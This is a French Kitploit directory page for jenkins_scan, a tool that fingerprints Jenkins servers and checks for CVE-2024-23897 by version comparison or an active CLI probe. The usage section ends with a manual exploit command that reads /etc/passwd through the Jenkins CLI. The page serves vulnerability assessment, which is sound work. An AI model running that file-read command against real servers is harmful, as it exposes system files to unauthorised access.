Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
jenkins_scan — Trouve l'environnement Jenkins et vérifie la présence de CVE-2024-23897 | Kitploit
Outils/GitHubGitHub/w41l3r/jenkins_scan
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubw41l3r/jenkins_scan

jenkins_scan

Trouve l'environnement Jenkins et vérifie la présence de CVE-2024-23897

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

jenkins_scan

Trouve l'environnement Jenkins et vérifie CVE-2024-23897

Comment ça fonctionne

Détection de Jenkins

Teste les chemins : /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

Identifie via :

  1. Header X-Jenkins — le plus fiable, renvoie aussi la version
  2. Header X-Hudson — instances plus anciennes
  3. Body HTML — chaînes comme "login to jenkins", "hudson.model", etc.
  4. /api/json — confirmation par la structure JSON (_class, jobs, views)

Vérification du CVE-2024-23897

Passif (par défaut) : compare la version détectée avec les seuils :

  • Weekly : < 2.442 → vulnérable
  • LTS : < 2.426.3 → vulnérable

Actif (--active) : envoie le handshake du protocole binaire du Jenkins CLI via HTTP. Si le serveur répond 200 + Content-Type: application/octet-stream, confirme que le canal CLI est ouvert et que l'exploit est applicable.

Utilisation

Scan basique

python jenkins_scan.py -f urls.txt

Avec probe actif + Burp comme proxy + sortie dans un fichier

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 threads, verbose, sans couleur (pour pipe/grep)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

Confirmer exploit manuellement sur cible vulnérable

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

Télécharger l’outil